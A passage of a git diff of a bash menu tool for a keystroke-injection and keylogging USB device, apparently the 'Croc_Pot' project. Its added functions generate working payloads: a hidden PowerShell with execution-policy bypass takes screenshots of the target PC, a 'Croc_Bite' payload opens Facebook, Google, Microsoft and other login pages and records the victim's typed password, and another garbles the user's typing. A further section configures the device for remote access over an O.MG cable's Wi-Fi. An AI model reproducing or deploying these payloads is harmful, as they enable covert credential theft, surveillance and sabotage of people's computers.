\"/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered\" ]; then\n PC_PW=\$(sed '\$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) -else\n#---> Edit LINUX-PC_PASSWD_HERE\n PC_PW=LINUX\nfi\n\nif [ -d /root/udisk/loot/Croc_pot/screenshot ]; then\n LED B\nelse\n mkdir /root/udisk/loot/Croc_pot/screenshot\nfi\n\nWINDS_SHOT=/root/udisk/tools/Croc_Pot/winds_shot.ps1\nOS_CHECK=\$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\nHOST_CHECK=\$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\n\nif [ \"\${OS_CHECK}\" = WINDOWS ]; then\n if [ -e \"\${WINDS_SHOT}\" ]; then +else\n#---> Edit LINUX-PC_PASSWD_HERE\n PC_PW=LINUX\nfi\n\nif [ -d /root/udisk/loot/Croc_Pot/screenshot ]; then\n LED B\nelse\n mkdir /root/udisk/loot/Croc_Pot/screenshot\nfi\n\nWINDS_SHOT=/root/udisk/tools/Croc_Pot/winds_shot.ps1\nOS_CHECK=\$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\nHOST_CHECK=\$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\n\nif [ \"\${OS_CHECK}\" = WINDOWS ]; then\n if [ -e \"\${WINDS_SHOT}\" ]; then ATTACKMODE HID STORAGE\n LED ATTACK\n Q GUI r\n sleep 1\n Q STRING \"powershell -nop -ex Bypass -w Hidden\"\n Q ENTER\n sleep 1\n Q STRING \"\\\$Croc = (gwmi win32_volume -f 'label=\\\"KeyCroc\\\"' | Select-Object -ExpandProperty DriveLetter)\" Q ENTER\n sleep 1\n Q STRING \".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'tools\Croc_Pot\winds_shot.ps1')\"\n Q ENTER\n sleep 5\n Q STRING \"exit\"\n Q ENTER\n ATTACKMODE HID\n LED FINISH\nelse\n LED ATTACK -echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_pot\screenshot\\\\\\\\\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\\\"\\\n\nAdd-Type -AssemblyName System.Windows.Forms\\\nAdd-type -AssemblyName System.Drawing\\\n\n\\\$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\\\n\\\$Width = \\\$Screen.Width\\\n +echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_Pot\screenshot\\\\\\\\\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\\\"\\\n\nAdd-Type -AssemblyName System.Windows.Forms\\\nAdd-type -AssemblyName System.Drawing\\\n\n\\\$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\\\n\\\$Width = \\\$Screen.Width\\\n \\\$Height = \\\$Screen.Height\\\n\\\$Left = \\\$Screen.Left\\\n\\\$Top = \\\$Screen.Top\\\n\\\$screenshotImage = New-Object System.Drawing.Bitmap \\\$Width, \\\$Height\\\n\n\\\$graphicObject = [System.Drawing.Graphics]::FromImage(\\\$screenshotImage)\\\n\\\$graphicObject.CopyFromScreen(\\\$Left, \\\$Top, 0, 0, \\\$screenshotImage.Size)\\\n \\\$screenshotImage.Save(\\\$outputFile)\\\nWrite-Output \\\"Saved to:\\\"\\\nWrite-Output \\\$outputFile\\\nStart-Sleep -s 5\" >> \${WINDS_SHOT}\n Q GUI r\n sleep 1\n Q STRING \"powershell -nop -ex Bypass -w Hidden\"\n Q ENTER\n sleep 1\n Q STRING \"\\\$Croc = (gwmi win32_volume -f 'label=\\\"KeyCroc\\\"' | Select-Object -ExpandProperty DriveLetter)\" Q ENTER\n sleep 1\n Q STRING \".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'tools\Croc_Pot\winds_shot.ps1')\"\n Q ENTER\n sleep 5\n Q STRING \"exit\"\n Q ENTER\n ATTACKMODE HID\n LED FINISH\n fi\nelse\ncase \$HOST_CHECK in\nraspberrypi)\n ATTACKMODE HID STORAGE\n LED ATTACK\n sleep 1\n Q ALT-F4\n Q GUI d\n sleep 1\n Q STRING \"LXTerminal\"\n Q ENTER\n Q ENTER @@ -3695,7 +5101,7 @@ echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_pot\screenshot\\\\\\\\\\\$(ge ATTACKMODE HID\n LED FINISH;;\n*)\n LED ATTACK\n Q ALT F2\n sleep 1\n Q STRING \"mate-terminal\"\n Q ENTER\n sleep 1\n Q STRING \"sudo mkdir /media/\\\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\\\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\\\$(whoami)/KeyCroc/\" Q ENTER\n sleep 1\n Q STRING \"\${PC_PW}\"\n Q ENTER\n sleep 1\n Q STRING \"sleep 2; import -window root /media/\\\$(whoami)/KeyCroc/loot/Croc_Pot/screenshot/\$(date '+%Y-%m-%d.%H.%M.%S').png; sudo umount /media/\\\$(whoami)/KeyCroc/; sudo rmdir /media/\\\$(whoami)/KeyCroc/; exit\"\n Q ENTER\n Q ALT-TAB\n sleep 10\n ATTACKMODE HID\n LED FINISH;;\n esac\nfi" >> ${Croc_Shot} ;; [nN] | [nN][oO]) - echo -ne "$(ColorYellow 'Maybe next time')\n";; + echo -ne "$(ColorYellow 'Maybe next time')\n" ;; *) invalid_entry ; screen_shot ;; esac @@ -3725,7 +5131,7 @@ case $r_a in Q ENTER ATTACKMODE HID else - echo -ne "\$outputFile = \"\$Croc\loot\Croc_pot\screenshot\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\"\n + echo -ne "\$outputFile = \"\$Croc\loot\Croc_Pot\screenshot\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\"\n Add-Type -AssemblyName System.Windows.Forms\nAdd-type -AssemblyName System.Drawing\n \$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\n\$Width = \$Screen.Width\n \$Height = \$Screen.Height\n\$Left = \$Screen.Left\n\$Top = \$Screen.Top\n\$screenshotImage = New-Object System.Drawing.Bitmap \$Width, \$Height\n @@ -3806,55 +5212,369 @@ fi ;; esac } ## +#----Croc_Bite payload social media account passwd Attempt +## +croc_bite() { + clear + echo -ne "$(Info_Screen ' +-Attempt to retrieve target pc Social media account passwd +-Create a payload called Croc_Bite.txt MATCH word will be Social media name +-This will open target pc web browser and open up Social media login page +-If successful passwd saved at /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered +-Ensure to run Croc_Pot_Payload.txt first')\n" + echo -ne "$(ColorRed '--THIS PAYLOAD IS RELYING ON THE ENTER KEY TO BE PRESSED\n +--AFTER THE USER HAS ENTER THE PASSWORD\n')" +## +#----check for existing Croc_Bite payload +## +if [ -e "/root/udisk/payloads/Croc_Bite.txt" ]; then + echo -ne "${yellow}Found existing Croc_Bite payload${clear}\n" + cat /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered + echo -ne "${LINE}\n" + cat /root/udisk/payloads/Croc_Bite.txt + echo -ne "\n" + read_all USE EXISTING CROC_BITE PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Keeping existing Croc_Bite payload${clear}" + install_payloads ;; +[nN] | [nN][oO]) + echo -ne "${red}Removing existing Croc_Bite payload${clear}" + rm /root/udisk/tools/Croc_Pot/Croc_Bite.txt /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered /root/udisk/payloads/Croc_Bite.txt ;; +*) + invalid_entry ; croc_bite ;; +esac +else + echo -ne "${yellow}No existing Croc_Bite payload${clear}\n" +fi +## +#----Create Croc_Bite payload +## +bite_payload() { + echo -ne "# Title: Croc_Bite\n# Description: Social media account passwd attempt this will open target pc web browser and open login page\n# Author: Spywill\n# Version: 1.0\n# Category: Key Croc\n\nMATCH ${1}\n +if [ -e \"/root/udisk/tools/Croc_Pot/Croc_OS.txt\" ]; then\n case \$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt) in\nWINDOWS)\n Q GUI d\n Q GUI r\n sleep 1\n Q STRING \"powershell -NoP -NonI -W Hidden -Exec Bypass\"\n Q ENTER + sleep 2\n Q STRING \"Start-Process ${@:2}; exit\"\n Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\nLINUX)\n case \$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt) in +raspberrypi)\n Q GUI d\n Q CONTROL-ALT-F1\n sleep 1\n Q STRING \"cp -u /usr/share/applications/lxterminal.* /home/\\\$(whoami)/Desktop\"\n Q ENTER\n Q ALT-F7\n sleep 5\n Q STRING \"LXTerminal\"\n Q ENTER\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\nparrot)\n Q ALT F2\n sleep 1\n Q STRING \"mate-terminal\"\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\n*)\n Q ALT F2\n sleep 1\n Q STRING \"xterm\"\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\n esac\n esac\nelse\n LED R\nfi\nLED FINISH" >> /root/udisk/payloads/Croc_Bite.txt + echo -ne "${green}-Croc_Bite payload install check payloads folder\n + unplug keycroc plug back in type in match word ${1}${clear}\n" +} +## +#----Croc_Bite menu +## +MenuTitle CROC BITE MENU ; MenuColor 19 1 FACEBOOK ATTEMPT ; MenuColor 19 2 INSTAGRAM ATTEMPT ; MenuColor 19 3 TWITTER ATTEMPT ; MenuColor 19 4 TIKTOK ATTEMPT +MenuColor 19 5 MESSENGER ATTEMPT ; MenuColor 19 6 GOOGLE ATTEMPT ; MenuColor 19 7 MICROSOFT ATTEMPT ; MenuColor 19 8 RETURN TO MAIN MENU ; MenuEnd 22 + case $m_a in + 1) bite_payload facebook https://www.facebook.com/login/ ; install_payloads ;; 2) bite_payload instagram https://www.instagram.com/accounts/login/ ; install_payloads ;; 3) bite_payload twitter https://twitter.com/login/ ; install_payloads ;; 4) bite_payload tiktok https://careers.tiktok.com/login ; install_payloads ;; + 5) bite_payload messenger https://www.messenger.com/login/ ; install_payloads ;; 6) bite_payload google https://accounts.google.com/signin ; install_payloads ;; 7) bite_payload microsoft https://login.microsoftonline.com/ ; install_payloads ;; + 8) main_menu ;; 0) exit 0 ;; [bB]) install_payloads ;; *) invalid_entry ; reboot_shutdown ;; + esac +} +## +#----Start web site on target pc web browser +## +web_site() { + clear + echo -ne "$(Info_Screen ' +-Enter web site name example https://www.google.com +-This will open target pc default web browser and start website')\n\n" +read_all START WEB SITE Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + read_all ENTER WEB SITE NAME AND PRESS [ENTER] + start_web ${r_a} ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; web_site ;; +esac +} +## +#----Keep target pc screen from sleeping +## +screen_on() { + clear + echo -ne "$(Info_Screen ' +-Keep Target pc screen from going to sleeping +-This will QUACK spacebar every 60 sec and backspace +-press CTRL + c to stop +-MATCH word is nosleeping')\n\n" +local No_sleep=/root/udisk/payloads/No_Sleeping.txt +if [ -e "${No_sleep}" ]; then + echo -ne "\n$(ColorGreen 'No_Sleeping PAYLOAD IS INSTALLED CHECK PAYLOADS FOLDER')\n" +else + read_all INSTALL NO_SLEEPING PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "# Title: No sleeping\n# Description: Keep Target pc screen from going to sleeping\n# Author: spywill\n# Version: 1.0\n# Category: Key Croc +#\n#\nMATCH nosleeping\nLED ATTACK\nQ GUI d\nwhile : ;do\nQ KEYCODE 00,00,2c\nQ BACKSPACE\nsleep 60\ndone" >> ${No_sleep} + echo -ne "\n$(ColorGreen 'No_Sleeping PAYLOAD IS NOW INSTALLED CHECK PAYLOADS FOLDER')\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; screen_on ;; + esac +fi +read_all KEEP SCREEN ON Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + Q GUI d + while : ;do + printf -v now "%(%s)T" -1 + read -t $(( 60-(now%60) )) K_L + Q KEYCODE 00,00,2c + Q BACKSPACE + done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; screen_on ;; +esac +} +## +#----Replace user text with random characters payload +## +text_replace() { + clear + echo -ne "$(Info_Screen ' +-Replace user text with random characters +-This will install Croc_replace.txt payload in payloads folder +-Enter the amount of characters to replace +-NOTE: After payload has ran this will insert # +infront of match to disable Croc_replace.txt payload +-Restart payload enter arming mode and remove #')\n\n" + local croc_replace=/root/udisk/payloads/Croc_replace.txt +if [ -e "${croc_replace}" ]; then + echo -ne "\n$(ColorGreen 'Croc_replace PAYLOAD IS INSTALLED CHECK PAYLOADS FOLDER')\n" +else + read_all INSTALL CROC_REPLACE PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + read_all ENTER NUMBER OF CHARACTER TO REPLACE AND PRESS [ENTER] + echo -ne "# Title: Croc_replace\n# Description: Replace user text with random characters enter a number for the amount to change\n# NOTE: TO restart this payload enter arming mode and remove the # in front of match +# Author: spywill\n# Version: 1.0\n# Category: Key Croc\n#\n#\nMATCH (?i)[0-9 a-z]\n\n#--->Enter the amount of characters to change here\nchar=${r_a}\n\necho -n \"a\" >> /tmp/text_replace.txt\nvar=\$(< /tmp/text_replace.txt)\n +if [[ \${#var} -gt \${char} ]] ; then\n LED OFF\n DISABLE_PAYLOAD payloads/Croc_replace.txt\n sed -i '9s/^/#/' /root/udisk/payloads/Croc_replace.txt\n RELOAD_PAYLOADS\nelse\n LED B\n Q BACKSPACE\n Q STRING \"\$(< /dev/urandom tr -cd '[:graph:]' | tr -d '\\\\\' | head -c 1)\" + LED R\nfi" >> ${croc_replace} + echo -ne "\n$(ColorGreen 'Croc_replace PAYLOAD IS NOW INSTALLED CHECK PAYLOADS FOLDER')\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; text_replace ;; + esac +fi +} +## #----Install Payloads Menu ## -MenuTitle INSTALL PAYLOADS MENU -MenuColor 1 GETONLINE PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 2 CROCUNLOCK PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 3 WIFI SETUP PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 4 QUICK START CROC_POT ; echo -ne " ${clear}\n" -MenuColor 5 CROCSHOT PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 6 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle INSTALL PAYLOADS MENU ; MenuColor 21 1 GETONLINE PAYLOAD ; MenuColor 21 2 CROCUNLOCK PAYLOAD ; MenuColor 21 3 WIFI SETUP PAYLOAD ; MenuColor 21 4 QUICK START CROC_POT +MenuColor 21 5 CROCSHOT PAYLOAD ; MenuColor 21 6 CROC_BITE PAYLOAD ; MenuColor 21 7 OPEN WEB SITE ; MenuColor 21 8 KEEP SCREEN ON ; MenuColor 21 9 REPLACE USER TEXT ; MenuColor 20 10 RETURN TO MAIN MENU ; MenuEnd 24 case $m_a in - 1) get_online_p ; install_payloads ;; - 2) croc_unlock_p ; install_payloads ;; - 3) wifi_setup_p ; install_payloads ;; - 4) quick_croc_pot ; install_payloads ;; - 5) screen_shot ; install_payloads ;; - 6) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; install_payloads ;; + 1) get_online_p ; install_payloads ;; 2) croc_unlock_p ; install_payloads ;; 3) wifi_setup_p ; install_payloads ;; 4) quick_croc_pot ; install_payloads ;; 5) screen_shot ; install_payloads ;; + 6) croc_bite ; install_payloads ;; 7) web_site ; install_payloads ;; 8) screen_on ;; 9) text_replace ; install_payloads ;; 10) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; install_payloads ;; + esac +} +## +#----O.MG cable Menu/Functions +## +function omg_cable() { + clear + local omg_v=/root/udisk/tools/Croc_Pot/OMG_WIFI.txt + echo -ne "$(Info_Screen ' +-# 1 connect keycroc to O.MG wifi access point +-# 2 Start O.MG web UI ensure keycroc is connected to O.MG AP first +-# 3 O.MG Github web page +-# 4 Create payload to connect Quickly to O.MG wifi access point +-# 5 Scan local network for O.MG cable')\n\n" +## +#----O.MG connect keycroc to O.MG wifi access point +## +omg_wifi() { + clear + echo -ne "$(Info_Screen ' +-Connect keycroc wifi to O.MG wifi access point +-Ensure O.MG cable is setup as wifi access point +-The purpose to this is access O.MG cable or Keycroc remotely +-From a remote device that is connected to O.MG wifi access point')\n\n" +## +#----O.MG scan for O.MG wifi access point +## +if [ -e "${omg_v}" ]; then + local scan_ssid=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n 's/.*\('$(sed -n 1p ${omg_v})'\).*/\1/p') + if [ "$(sed -n 1p ${omg_v})" = "${scan_ssid}" ]; then + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n 1p ${omg_v})'/p' + echo -ne "${green}O.MG wifi access point online${clear}\n" + else + echo -ne "${red}O.MG wifi access point offline${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + fi +else + read_all ENTER O.MG SSID AND PRESS [ENTER] + local scan_ssid=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n 's/.*\('${r_a}'\).*/\1/p') + if [ "${r_a}" = "${scan_ssid}" ]; then + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'${r_a}'/p' + echo -ne "${green}O.MG wifi access point online${clear}\n" + else + echo -ne "${red}O.MG wifi access point offline${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + fi +fi +## +#----O.MG start connection +## + read_all START CONNECTION Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) +if [ -e "${omg_v}" ]; then + echo -ne "${yellow}FOUND EXISTING O.MG WIFI CREDENTIALS${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n 1p ${omg_v})'/p' + read_all USE EXISTING O.MG CREDENTIALS AND CONNECT Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +[nN] | [nN][oO]) + rm ${omg_v} + read_all ENTER O.MG SSID AND PRESS [ENTER] ; echo "${r_a}" >> ${omg_v} + echo -ne "${yellow}Checking for O.MG wifi access point ${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + echo -ne "$(ColorYellow 'ENTER O.MG WIFI CREDENTIALS')\n" + user_input_passwd ${omg_v} O.MG_WIFI + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +*) + invalid_entry ; omg_wifi ;; + esac +else + echo -ne "${red}DID NOT FOUND ANY EXISTING O.MG WIFI CREDENTIALS${clear}\n" + read_all CONNECT KEYCROC TO O.MG CABLE WIFI ACCESS POINT Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Checking for O.MG wifi access point ${clear}\n" + iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort + echo -ne "$(ColorYellow 'ENTER O.MG WIFI CREDENTIALS')\n" + read_all ENTER O.MG SSID AND PRESS [ENTER] ; echo "${r_a}" >> ${omg_v} + user_input_passwd ${omg_v} O.MG_WIFI + echo -ne "${yellow}Editing the keycroc config file to O.MG WIFI credentials${clear}\n" + sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID '$(sed -n 1p ${omg_v})'\nWIFI_PASS '$(sed -n 2p ${omg_v})'\nSSH ENABLE' /root/udisk/config.txt + LED G + echo -ne "${green}Keycroc is now config to O.MG unplug keycroc and plug back in${clear}\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_wifi ;; + esac +fi ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_wifi ;; +esac +} +## +#----O.MG start O.MG web UI +## +omg_web() { + clear + echo -ne "$(Info_Screen ' +-Open target pc web browser and start O.MG web UI +-Ensure target pc is connected to O.MG wifi access point first')\n\n" + read_all START O.MG WEB UI Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + start_web http://192.168.4.1 ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_web ;; +esac +} +## +#----O.MG wifi access point payload +## +omg_quick_connect() { + clear + echo -ne "$(Info_Screen ' +-Create payload to connect Quickly to O.MG wifi access point +Select # 3 WIFI SETUP PAYLOAD to create payload')\n\n" + read_all CREATE PAYLOAD FOR O.MG QUICK CONNECT AP Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + install_payloads ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_quick_connect ;; +esac +} +## +#----O.MG check local network for O.MG cable +## +omg_check() { + clear + echo -ne "$(Info_Screen ' +-Check local network for O.MG cable +-Ensure O.MG is connected to same local network as Keycroc')\n\n" +## +#----Ping entire network +## + read_all SCAN FOR O.MG CABLE Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for omg in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$omg >/dev/null && echo "$t_ip$omg" &) ;done + arp -a | sed -n 's/\(OMG\)/\1/p' + local omg_ip=$(arp -a | sed -n 's/\(OMG\)/\1/p' | awk '{print $2}' | sed 's/[(),]//g') + if [[ "${omg_ip}" =~ ${validate_ip} ]]; then + ping -q -c 1 -w 1 ${omg_ip} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${red}No O.MG cable detected${clear}" + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow}O.MG cable IP:${clear}${green}${omg_ip}${clear}\n" + read_all START O.MG WEB UI Y/N AND PRESS [ENTER] + case $r_a in + [yY] | [yY][eE][sS]) + start_web http://${omg_ip} ;; + [nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; + *) + invalid_entry ; omg_check ;; + esac + fi + else + echo -ne "${red}No O.MG cable detected${clear}" + fi ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; omg_check ;; +esac +} +## +#----O.MG cable Menu +## +MenuTitle O.MG CABLE MENU ; MenuColor 21 1 KEYCROC TO O.MG WIFI ; MenuColor 21 2 START O.MG WEB UI ; MenuColor 21 3 O.MG GITHUB PAGE ; MenuColor 21 4 O.MG AP PAYLOAD ; MenuColor 21 5 O.MG LOCAL NETWORK ; MenuColor 21 6 RETURN TO MAIN MENU ; MenuEnd 24 + case $m_a in + 1) omg_wifi ; omg_cable ;; 2) omg_web ; omg_cable ;; 3) start_web https://github.com/O-MG ; omg_cable ;; 4) omg_quick_connect ;; 5) omg_check ; omg_cable ;; 6) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; omg_cable ;; esac } ## #----Croc Pot Plus Menu ## -menu_B() { +function menu_B() { + clear LED B -MenuTitle CROC POT PLUS MENU -MenuColor 1 RECON SCAN ; echo -ne " ${clear}\n" -MenuColor 2 KEYSTORKES LAPTOP ; echo -ne " ${clear}\n" -MenuColor 3 WINDOWS INFO SCAN ; echo -ne " ${clear}\n" -MenuColor 4 CROC VPN SETUP ; echo -ne " ${clear}\n" -MenuColor 5 PASS TIME GAMES ; echo -ne " ${clear}\n" -MenuColor 6 WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 7 INSTALL PAYLOADS ; echo -ne " ${clear}\n" -MenuColor 8 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd + croc_title +MenuTitle CROC POT PLUS MENU ; MenuColor 20 1 RECON SCAN MENU ; MenuColor 20 2 KEYSTORKES LAPTOP ; MenuColor 20 3 WINDOWS INFO SCAN ; MenuColor 20 4 CROC VPN SETUP ; MenuColor 20 5 PASS TIME GAMES +MenuColor 20 6 WINDOWS DEFENDER ; MenuColor 20 7 INSTALL PAYLOADS ; MenuColor 20 8 O.MG CABLE MENU ; MenuColor 20 9 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) croc_recon ; menu_B ;; - 2) keystorkes_laptop ; menu_B ;; - 3) windows_check ; menu_B ;; - 4) croc_vpn ; menu_B ;; - 5) pass_time ; menu_B ;; - 6) windows_defender ; menu_B ;; - 7) install_payloads ; menu_B ;; - 8) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; menu_B ;; + 1) croc_recon ; menu_B ;; 2) keystorkes_laptop ; menu_B ;; 3) windows_check ; menu_B ;; 4) croc_vpn ; menu_B ;; 5) pass_time ; menu_B ;; 6) windows_defender ; menu_B ;; + 7) install_payloads ; menu_B ;; 8) omg_cable ; menu_B ;; 9) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; menu_B ;; esac } menu_B @@ -3863,6 +5583,7 @@ menu_B #----Croc status menu/functions ## function croc_status() { + local LOOT_INFO=/root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt ## #----SSH Install screenfetch ## @@ -3870,62 +5591,66 @@ function croc_status() { ## #----SSH Display screenfetch ## -echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" -screenfetch 2> /dev/null -echo -ne "\e[48;5;202;30m${LINE}${clear}\n" -local server_name=$(hostname) + echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" + screenfetch 2> /dev/null + echo -ne "\e[48;5;202;30m${LINE}${clear}\n" + local server_name=$(hostname) memory_check() { clear - echo -ne "\n$(ColorYellow 'Memory usage on') ${server_name} is:\n" - egrep --color=auto 'Mem|Cache|Swap' /proc/meminfo - free -t -m - cat /proc/meminfo - vmstat - df -h - iostat + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}MEMORY STATUS${LINE_}\n" | tee -a ${LOOT_INFO} ; cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Memory usage on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; df -h | xargs | awk '{print "Free/total disk: " $11 " / " $9}' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + egrep --color=auto 'Mem|Cache|Swap' /proc/meminfo | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; free -t -m | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; cat /proc/meminfo | tee -a 